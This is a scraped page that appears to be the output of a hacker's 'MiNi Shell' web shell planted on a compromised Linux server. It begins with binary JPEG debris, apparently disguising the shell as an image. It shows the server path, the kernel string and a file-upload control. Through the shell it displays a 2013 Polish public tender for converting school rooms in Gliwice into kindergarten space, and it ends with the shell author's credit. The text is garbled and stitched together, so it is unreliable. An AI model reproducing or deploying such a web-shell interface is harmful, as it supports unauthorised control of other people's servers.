JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130517/79895-N-2013.html

<p class="kh_header"><b>Gliwice: Modernizacja budynku - adaptacja pomieszczeń
dla oddziałów przedszkolnych.</b><br>
<b>Numer ogłoszenia: 79895 - 2013; data zamieszczenia: 17.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Ogólnokształcących Nr 7 w Gliwicach , ul. Aleksandra Gierymskiego 7, 44-100 Gliwice, woj. śląskie, tel. 0-32 231-42-01, faks 0-32 231-42-01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zso7-gliwice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja budynku - adaptacja pomieszczeń
dla oddziałów przedszkolnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty
budowlane. Przedmiotem robót są prace związane z adaptacja pomieszczeń istniejących sal dydaktycznych
znajdujących się miedzy osiami A_B i 1_3 oraz pomieszczeń mieszkania służbowego znajdującego sie miedzy
osiami B_C i 1_3 na potrzeby przedszkola zlokalizowanego na parterze budynku szkolnego Łączna powierzchnia
użytkowa pomieszczeń wynosi około: 89,90(parter)+49,70(piwnica) = 139,60 m2 Zakres prac: a) demontaż
schodów prowadzących do piwnicy oraz uzupełnienie stropu w tym miejscu; b) wyburzenie całości lub
fragmentów ścian działowych; c) wykonanie przejścia miedzy kominami w ścianie oddzielającej pomieszczenia
dydaktyczne od mieszkania służbowego; d) wykonanie otworów drzwiowych wraz z założeniem nadproży; e)
wyburzenie ścian wiatrołapu w mieszkaniu służbowym; f) wykonanie otworu przejściowego w piwnicy w osi nr 2;
g) demontaż okna, pomniejszenie otworu okiennego i montaż nowego okna w ścianie zewnętrznej w osi nr 3; h)
przesuniecie pionu wodnego; i) wymiana istniejących drzwi wejściowych w osi C; j) zmiana aranżacji pomieszczeń
(wyburzenia i wymurowania); k) montaż nowych drzwi wewnętrznych; l) tynkowanie i malowanie pomieszczeń
użytkowych; m) położenie nowych posadzek w pomieszczeniach użytkowych; n) demontaż istniejącej
wewnętrznej instalacji gazowej; o) przebudowa instalacji wewnętrznych (c.o., wod.-kan., elektrycznej, wentylacji
mechanicznej). p) dostawa i montaż wyposażenia q) wykonanie graffiti r) aranżacja pomieszczeń s) wywóz i
utylizacja odpadów t) inne prace nie wymienione a niezbędne do kompletności dzieła Wykonawca, dodatkowo, wramach realizacji przedmiotu zamówienia i w ramach zaoferowanej ceny: - złoży złom użytkowy z rozbiórki w
miejscu wskazanym przez zamawiającego, wywiezie i sprzeda złom pozyskany z rozbiórki oraz zwróci uzyskane
środki finansowe zamawiającemu - opracuje projekt organizacji robót z planem BIOZ i przedstawi go
zamawiającemu do uzgodnienia, jeśli jest wymagany - pokryje koszty zużycia wody, energii elektrycznej na
postawie zamontowanych na swój koszt urządzeń pomiarowych lub na podstawie odrębnego porozumienia stron. -
zastosuje materiały pierwszego gatunku - wykona zabezpieczenie podłóg i posadzek przed uszkodzeniem w
związku z realizacją robót - zabezpieczy sąsiadujące pomieszczenia przed zapyleniem w związku z realizacją robót
- przekaże Zamawiającemu zapas płytek użytych do wykonania robót: płytki posadzkowe - 1m2 z każdego koloru,
płytki ścienne - 1m2 z każdego koloru - wykonana graffiti na ścianach zgodnie z dokumentacja projektowa -
wykona inne prace nie wymienione, lub nie ujęte w przedmiarach a wynikające z dokumentacji projektowej
Szczegółowy opis przedmiotu zamówienia zawarty jest w następujących opracowaniach: -ZAŁĄCZNIK NR 7 -
przedmiary robót -ZAŁĄCZNIK NR 8 - dokumentacja projektowa -ZAŁĄCZNIK NR 9 - Specyfikacja Techniczna
Wykonania i Odbioru Robót -ZAŁĄCZNIK NR 10 - pozwolenie na budowę Przedstawione w powyższych, lub innych
dokumentach wskazania na urządzenia techniczne i materiały z podaniem producenta należy traktować jako
przykładowe ze względu na zasady ustawy Prawo zamówień publicznych, a zwłaszcza art. 29 do 31.Podane
dokładne określenia np. nazwy dostawców, producentów, materiałów, urządzeń, ich elementów, nie oznaczają, ze
obowiązkowo należy je zaoferować. Zamawiający dopuszcza składanie ofert zawierających rozwiązania
równoważne. Wykonawca, który powołuje się na rozwiązania równoważne opisywane przez Zamawiającego, jest
obowiązany wykazać, ze oferowane przez niego materiały, urządzenia, ich elementy spełniają wymagania
określone przez Zamawiającego, poprzez np. dołączenie katalogów, folderów, opisów technicznych, certyfikatów,
atestów oferowanego rozwiązania równoważnego oraz uzyskać wszelkie ewentualne uzgodnienia. Wykonawca
udzieli na przedmiot zamówienia gwarancji na okres 3 lat i rękojmi na okres 3 lat, zgodnie z zapisami umowy
(załącznik nr 6 do SIWZ). Zamawiający dopuszcza przeprowadzenie przez Wykonawcę (przed złożeniem oferty)
wizji lokalnej miejsca robót objętego przedmiotem zamówienia, po uprzednim uzgodnieniu terminu z
Zamawiającym. Inne wymagania: a) wykonawca zastosuje do realizacji przedmiotu zamówienia tylko fabrycznie
nowe materiały, urządzenia oraz wyposażenie, b) przy przygotowaniu oferty i realizacji robót należy uwzględnić
specyfikę pracy w czynnych obiektach oświatowych. c) przy przygotowaniu oferty i realizacji robót Wykonawca
winien uwzględnić fakt realizacji przez innego wykonawcę, innego zakresu robót Uwaga: Wersja papierowa
dokumentacji projektowej, Specyfikacji Technicznej Wykonania i Odbioru Robót udostępniana jest Wykonawcom
do wglądu w siedzibie Zamawiającego. Na wniosek Wykonawcy, za dodatkową odpłatnością, Zamawiający
sporządzi kserokopie dokumentacji projektowej, Specyfikacji Technicznej Wykonania i Odbioru Robót.Dokumenty
wymienione w poprzednim zdaniu dostępne są bezpłatnie na stronie internetowej www.um.gliwice.pl/bip
/Zamówienia publiczne jednostek miejskich..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.00.00-1, 45.40.00.00-1, 45.31.00.00-3, 45.33.11.00-7, 45.33.00.00-9, 45.33.12.00-8, 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w kwocie: 5000,00 złotych,
słownie: pięć tysięcy złotych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, których wiedza i doświadczenie pozwoli na prawidłowe
wykonanie zamówienia, to znaczy Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich pięciu
lat przed upływem terminu składania ofert -a jeżeli okres prowadzenia działalności jest krótszy - w tym
okresie - zrealizował co najmniej jedną robotę budowlaną wielobranżową dotyczącą remontu, budowy lub
przebudowy pomieszczeń, o wartości co najmniej 100 000,00 zł brutto. Ocena spełniania tego warunku
odbędzie się na podstawie oświadczenia - ZAŁĄCZNIK NR 2, wykazu robót budowlanych -ZAŁĄCZNIK NR
4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą dostarczyć dokumenty
potwierdzające, że łącznie spełniają warunki udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, których potencjał techniczny pozwoli na prawidłowe
wykonanie zamówienia,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, którzy dysponują lub będą dysponować osobami zdolnymi do
wykonania zamówienia, to znaczy Wykonawca musi dysponować: a) osobą kierownika budowy,posiadającą
uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno-budowlanej i wpisana do
właściwej Izby Inżynierów Budownictwa - jeżeli odrębne przepisy nakładają obowiązek takiego wpisu, b)
osoba kierownika robót posiadającą uprawnienia budowlane do kierowania robotami w specjalności
instalacyjnej w zakresie sieci i instalacji sanitarnych i wpisana do właściwej Izby Inżynierów Budownictwa
- jeżeli odrębne przepisy nakładają obowiązek takiego wpisu, c) osoba kierownika robót posiadająca
uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci i instalacji
elektrycznych i wpisana do właściwej Izby Inżynierów Budownictwa -jeżeli odrębne przepisy nakładają
obowiązek takiego wpisu. Ocena spełniania tego warunku odbędzie się na podstawie oświadczenia -
ZAŁĄCZNIK NR 2, wykazu osób -ZAŁĄCZNIK NR 3. W przypadku podmiotów działających wspólnie osoby
zdolne do wykonania zamówienia podlegają sumowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, których sytuacja ekonomiczna i finansowa pozwoli na
prawidłowe wykonanie zamówienia, to znaczy Wykonawca winien być ubezpieczony od odpowiedzialności
cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą
niż 100 000,00 złotych. W przypadku podmiotów działających wspólnie potencjał ekonomiczny i finansowy
podlega sumowaniu,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania  zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamównienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmiany postanowień zawartej umowy w przypadkach: - działania siły wyższej i wynikającej z tego
zmiany terminu wykonania robót - wyjątkowo niesprzyjających warunków fizycznych, bądź atmosferycznych i
wynikającej z tego zmiany terminu wykonania robót - wystąpienia obiektywnych przesłanek zaakceptowanych
przez Zamawiającego i wynikającej z tego zmiany terminu wykonania robót - wystąpienia zdarzeń na które strony
nie maja wpływu, a które uniemożliwiają przy normalnym tempie prac wykonanie umowy w terminie i wynikającej
z tego zmiany terminu wykonania robót - zawieszenia przez Zamawiającego wykonania robót i wynikającej z tego
zmiany terminu wykonania robót - braków lub wad w dokumentacji przetargowej lub innych dokumentach
budowy i wynikającej z tego zmiany terminu wykonania robót - rezygnacji z wykonania części robót i wykonanie
robót zamiennych oraz wynikającej z tego zmiany terminu wykonania robót i wartości wynagrodzenia umownego -
zmiany zakresu robót wynikających z decyzji administracyjnych i wykonanie robót zamiennych oraz wynikającej z
tego zmiany terminu wykonania robót i wartości wynagrodzenia umownego - wystąpienia zamówień dodatkowych
niezbędnych do prawidłowego wykonania realizowanego zamówienia podstawowego, których wykonanie stało się
konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia i wynikającej z tego zmiany terminu
wykonania robót - zmiany przedstawicieli uczestników procesu inwestycyjnego, - nieterminowego przekazania
placu budowy, lub poszczególnych frontów robót i wynikającej z tego zmiany terminu wykonania robót - zmiany
rozwiązań technologicznych wykonania robót wyszczególnionych w dokumentacji przetargowej polegające na
zmianie sposobu wykonania robót pod warunkiem: technologia proponowanego rozwiązania musi być co najmniej
na poziomie technologii zastosowanej w dokumentacji przetargowej lub wyższym. Wykonawca musi uzyskać
zgodę na zastosowanie innych rozwiązań od Zamawiającego. - aktualizacji rozwiązań projektowych z uwagi na postęp technologiczny, zmian obowiązujących przepisów, warunków uniemożliwiających prowadzenie robót,
bezpieczeństwa pracy, a także zmian wynikających z innych nieprzewidywalnych istotnych okoliczności, zmian
rozwiązań technologicznych wykonania robót wyszczególnionych w dokumentacji przetargowej polegających na
zmianie sposobu wykonania robót, których wprowadzenie będzie korzystne dla Zamawiającego. Wykonawca musi
uzyskać zgodę Zamawiającego na zastosowanie innych rozwiązań. - zmiany zakresu robót przeznaczonych do
wykonania przez podwykonawce - wprowadzenie lub zamiana podwykonawcy - w przypadkach uzasadnionych, za
pisemną zgodą Zamawiającego - dotyczy zakresu robót, który może być powierzony podwykonawcy, pomimo, ze
w ofercie Wykonawca nie przedstawił zakresu robót, który powierzy podwykonawcom. - obniżenie wartości
wynagrodzenia umownego w przypadku, gdy zakres prac opisany w dokumentacji przetargowej ze względów
technicznych, ekonomicznych lub formalno - prawnych nie będzie konieczny do wykonania - w przypadku zmiany
w obowiązujących przepisach możliwa jest zmiana treści umowy w tym zakresie - wprowadzenie zmiany w danych
Wykonawcy lub Zamawiającego wynikających z dokumentów rejestrowych - niezawinionych przez Wykonawce
opóźnień w uzyskaniu wymaganych pozwoleń, uzgodnień, decyzji lub opinii innych organów, niezbędnych do
uzyskania koniecznych pozwoleń i wynikającej z tego zmiany terminu wykonania robót - poprawy jakości lub
innych parametrów charakterystycznych dla danego elementu robót budowlanych, dostaw lub zmiany technologii,
- aktualizacji rozwiązań projektowych z uwagi na postęp technologiczny bądź zmiany obowiązujących przepisów, -
zmiany przepisów prawa w trakcie realizacji zamówienia, powodujących konieczność dostosowania dokumentacji,
- niezawinionych przez Wykonawcę opóźnień w uzyskaniu pozwolenia na użytkowanie i uruchomieniu obiektu, -
zmiany przepisów prawa istotnych dla postanowień zawartej umowy,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.gliwice.pl./bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Ogólnokształcących Specjalnych Nr 7, ul. Gierymskiego 7, 44-102 Gliwice...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.06.2013 godzina 12:00, miejsce: siedziba zamawiającego lub listownie na adres zamawiającego..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com